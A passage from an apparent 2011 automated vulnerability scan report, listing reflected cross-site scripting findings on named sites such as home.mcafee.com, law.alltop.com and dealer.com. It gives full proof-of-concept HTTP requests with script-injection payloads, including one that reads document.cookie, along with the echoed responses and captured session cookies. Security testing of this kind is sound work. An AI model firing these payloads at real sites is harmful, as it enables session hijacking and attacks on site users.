The value of the locale request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b9af'%3balert(1)//722916ad0cd was submitted in the locale parameter. This input was echoed as 1b9af';alert(1)//722916ad0cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US1b9af'%3balert(1)//722916ad0cd HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f4fdeb00a0a00ed0114d7392b1ea276;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2932

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms18.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<![CDATA[*/
   window.DDC = window.DDC || {};
   DDC.locale = DDC.locale || 'en_US1b9af';alert(1)//722916ad0cd';
/*]]>
...[SNIP]...

4.38. http://home.mcafee.com/root/campaign.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /root/campaign.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70676"%3balert(1)//845bc386871 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70676";alert(1)//845bc386871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /root/campaign.aspx?cid=83831&70676"%3balert(1)//845bc386871=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
Referer: http://home.mcafee.com/downloads/free-virus-scan
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/downloads/free-virus-scan; currentURL=http%3A//home.mcafee.com/downloads/free-virus-scan; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; FSRCookie=isAlive=1||ForeseeLoyalty=1; foresee.alive=1303045172416; s_nr=1303045173262-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045173265%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//home.mcafee.com/root/campaign.aspx%25253Fcid%25253D83831%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: CampaignId=83831; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=83831; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=83831&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:54 GMT
Content-Length: 1254


<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>

</title></head>
<body>
<form name="form1" method="post" action="campaign.aspx?cid=83831&amp;70676%22%3balert(1)%2f%2f8
...[SNIP]...
<script type="text/javascript">
window.location.href = "http://liteapps.mcafee.com/apps/mss/download.asp?affid=0&large=1&cid=83831&70676";alert(1)//845bc386871=1";
</script>
...[SNIP]...

4.39. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b6e35<script>alert(1)</script>73b5bcd535 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=I09839b6e35<script>alert(1)</script>73b5bcd535 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/za/additem?a5f9f=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dcaca1f&0&&4da49860&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dcacfbc&0&&4da5225d&00f8712b16a2747053422af6cef97d9a; udm_0=MLvvNCMJaSprXddp9/QSiCJJZUpA13VK8YcBYRcedc3yUwOBneDsJGtepQEFjR+a+OupXIwcZ1OeTUVINTqk0zO5oWogyihu9s9rBQg1IH1+bVjad47pUEFaS/Xd13eTo/zf95LMFqzMHYGD0ggaVHs7MRO3s9KnN6v+NxGTFAvFUtGHQFtHguOo/CvxF8q7+XjOi6n6Xe0Oy+Z8gE8h646FdCQE2e/wVT7XRaaoCYI4E3rFlS8f24WStc4+SLyr1XjK6hEIW7ke7hwEEmOI1djxOPTAcc4V8XYgXQ7DLaeRZX9QpHdeR4g0UuqWEwM0xt+YZBjJSjnr53AZ35+iGe9OrwyEQOIQGNgO9Jb3SSh7VK8qanuelhFmVzC6B07MEeHjEWrXzM5MWlxRoH0b1dzBr0NRhbCM9ROMXz4+dCBhf3/LbMzMfdbVN2vRgE07XhieP4fHn7IizW7lorbHlfFrX4kbNLnN1cJmjOt06Px6JUE3uiH5TTs0f0q/ilm2oHrO/jVKY19wNiFOs7mnaCwnyuU5zR6KnSbBiv5bJbYqkfNvnRT4tUvJFoTN4nwKbV3pHZoHUze2ohoFkdR7B38w4MvT7y2ZABf/CG3VdS/1UAGmSzR7qZd4xSbEB0Se3EQsBeJLS0W1eA+Mii/MYkcaHsWiEOyM7jy4iVHA32+JFkR++d7qZpV416jIX9iC9yP3p7KQ5/n+OPhtzLvtR1N2DSIKPct6tD63g0wwoeBKHDw/Q+lPvbajqP+Omw/Ns/KN09RTJ7b/XCKnRnQXiC1p8lyJe/hnhUHgXBmVJ9RasT8W/VjblkzR7R++rTX9X5e02b+EM9FaqjOZi2Z7yKH9ozf40veaXs916NWABllj19F0oVirrRzhrVMnopyGpRD/nc5VuyHE7Tzab0IjGxMhiNP7FrYVlFMr7kvDqRVLuhdTQ7HYkb2PWEIN0Io8Noc6Qafpmhx71C5va7NYKsPqPjYIs7T5RHPtgB96jc9dMnlHpDUk1czteck0vZT1szvwTMqvUHAwfrNCqe6+B5/yG2WgJBo69PWL7i2MzP3zKnrXB8Feb89gExuaz/NSrCOUWhw4Ki3AUZS590bdWvbTxFy4nr8v6iI04f3u7/yqG2yjNFyuBRyz6Iz8mwwJAV1LvBgTQCx85+PA6YryjOyQUQTMorTERiOFDkPHDA8mSCwSAH5tkW1it0mUfxxBm3+G14XMNtKOe2+RIHoUM7Ybz/e9HoPDkImVuC4jFcefU8uuh53jlDVHCsceenbRU6WeFliKlZetf2awKXuKKIxpioly9QITVF8x9rettZmpiPORzVuSmR65YOJDFVIyNOAyo2Y6qoL/zJ8tHQ==; NETSEGS_K08784=379226250c6302c7&K08784&0&4dce87da&0&&4da90335&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHrVEucB5zJoH0UljaSkoWWEQP/HsN06aUy4hJ4iAxx4kUbDRiYNBumGFB/7hKFwUF5zkuxs3CTF/hxUboLnFkdRFbpB82GEClPl/i5LndwMyIvIcjCjo7BukEz0m4KS8PDEhKXh6N5GwMhcufRERxUalBRHypYmdvWKAhKNafO2dPtsGuKb5neHsE6FwjUIRA83vfNnPyB8p5PQ1zYBnhNMA6wEUVThR2g7B12YjsMRCFaKHz0TGKswVgaiTCqLjgfT0S+GuZLiD52/VC0Nv2ONiR1XNhgTjk6Q0+hk9MQpEV63vVrfOvxiDyd6HBsoG8G+z06EiVnR8D/xRKZzFJC3E63+8VHkDGmCkdgwhnroue3nKVHQHh"; rsi_us_1000000="pUP1ZTmnPwIYFEKmY9/6A4gq13OqBLIPfAIwaLPuWvzroz3RO6ywpasmnCZ6zXE2WlA0J4hR7z/d18QtB0zQICAlCzDSokYwgb2QNGJ15/S+MvUxS+Te5UVeHz9JdiDw0K/0EYf29cLyAOcjvS8jQB7beWFHA0BGY7GeBW/MsnWI4UPfTLKd31zD36g1ZqMWwnUF9jVX74JrRQR73VcAl55tRxG4rTCpo3+I/SafnpmPBzUaa/bO8R02njGCcmuIH6LCnT7bnMKmty4oF91N+ptYuAsah0DCUaDiBrT+n4WxELFx7BgNNvT1D5nOyJNjDh6I5dM+/i+tBWukNrn3QOGjDeB1wEZK9TkdF6pvDuLBkeTV/bcgvIBRxRW43FqsYqml/akYJg74KEP6aj+PB2+Bx0JPJvXDWj/PWwzYCwlcb+5ZnJGV2ab/qOt9BrseFVypzD3DbbaDNjdTHr0wAqmJJRaOsKWhn2U9EnMwcH2TXgX0tciaHa0T4h9sUcZaIyeNGvTowFQzEDXKiAguT0d2OOZ8CYxiYjOU78fISCUjp+5BKu6pDIBid2gsgGuiYSwDa8KWFt0lnUp54/5XBdDJ6VrdZa4zf/5D/InSUbq5cxuSbuMzRE67JI5kPOBRs49p3a/cpKFPzSZ2h1ftLm6aj6oOCAaBPrVlWB1gW0j/KtgScBEqpJVajLm3cFbaRnING7007FdavPnbJT4wBftL/cd5SsOeHt6N75ZEF3lMyUULERJMrLcftVNYJrm5j2J+sE6RX0VH"; rsi_segs_1000000=pUPFJU2Br3IM1p94u+w/JTlpea6iE6ea4dqUtRDorAMqsncbnFjc6nNskvAlloepKxEYDeToWSqCVsVxZnlRuDx7h5Ea24oGNFbXEHQrasy4JCDlXf200Z7tQxzqzT7PDo/eR1qUcqeI+3EDwcun/AAYgjloHX61Y4c7Hvi4zjIKdOGRSqIRtGLjBVER2sD3CjtZ8En8TPq0EE/msi6btEvQhcMwR74VMe4oTmE8951fn5uhhxlREM4fiwBI+G9ouXWU9gKJRtfR4qM2z1jQZGgqBFTaKHYIvod7xmJw+xLYp49u/i1ph8m/SFWsPjxgOlFnng8XR7fuEOOne4rwDVuRJBHPrzAmBFvaDz4N9iTrTjhuRvF5MBGbAMZ7OIST0jt76s/RSCeW; rtc_vEGl=MLsP8yMOpj9npihAUr5veO17+bGDNlfDNYUVEaaFy3Qa3QeSNA+pUy8X71aMMnqJWFCFfMdx0QJk1bpFee+Bru4Evuk6jJSJ5K5QPBoQ29CRrbObs3X7UbBMgXutLDUvFS6EiAxiGvCYsx4ZVZnlulYU4N5ED6IWuNwJ/tYMbLxhG4NsqkrqlLd9ESuY8cwqHf3rdI/wpTZmnlmU+B262lJXJWTzDIzydSyX0uLeCdJ0J0tDi3t7J2FJbm43pOk2722GtDFUF9cM354Tli8E+l7iF3vPKcUN42uTo+l3iMlPs/wt+IXbsr6bFzfDtA8KF6JVgdU63L+OMIsPeYravHNeBAQZ9CrY9MyyDnl62djTds48dfAabNevlq6f31weH0ybotK+O6yIvh/Esk/kRuOt4uCIbRcNyrYKmOp3khFnZafOY2PNRM/sN8gkgBNyB+XQMfjlRozGCWKOxUy8FqRLhpDMO03oEUvYPFhuVS1Vg2CvzHOPyqqrGubX/qaKhpF9psA7qvt8CaOK5jxOaoY2aI9H7FWA4qsAMiTtNbGwudPP9i58GHHumvMHAy6jQohCGZ3dvPzzTu24ESHQUGWxfA9hF1aQZp8DXD/H4TxKtfmW1R/toGkJ/NnVE/h1GCtPt1HlE83hw2el+hrsWgvpjC3aHgsq

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 17 Apr 2011 14:24:11 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 18 Apr 2011 14:24:11 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:10 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "I09839B6E35<SCRIPT>ALERT(1)</SCRIPT>73B5BCD535" was not recognized.
*/

4.40. http://law.alltop.com/css/din-bold.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0c7"><script>alert(1)</script>4acc94967d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:36 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:36 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:36 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf" method="post" accept-charset="utf-8">
...[SNIP]...

4.41. http://law.alltop.com/css/din-bold.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91506"><script>alert(1)</script>bc3da8f28a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0 HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0" method="post" accept-charset="utf-8">
...[SNIP]...

4.42. http://law.alltop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32383"><script>alert(1)</script>e537a41bbed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico32383"><script>alert(1)</script>e537a41bbed HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/favicon.ico32383"><script>alert(1)</script>e537a41bbed" method="post" accept-charset="utf-8">
...[SNIP]...

4.43. http://law.alltop.com/widget/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /widget/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fa3b"><script>alert(1)</script>3c139cf78b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://www.jamesprobinsonlaw.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=vpc5m17i3plcmgqib9tk2rbp06; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:49:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_v=4ca316e9121138d4d76ae9359c78da59; expires=Tue, 13-Apr-2021 13:49:07 GMT; path=/; domain=law.alltop.com
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:49:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js" method="post" accept-charset="utf-8">
...[SNIP]...

4.44. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6210f<script>alert(1)</script>d253288866b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303045152447-372951&mboxPage=1303045152447-372951&mboxCount=1&mbox=mbx_company_landing6210f<script>alert(1)</script>d253288866b&mboxId=0&mboxTime=1303027152504&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fcompany&mboxReferrer=&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
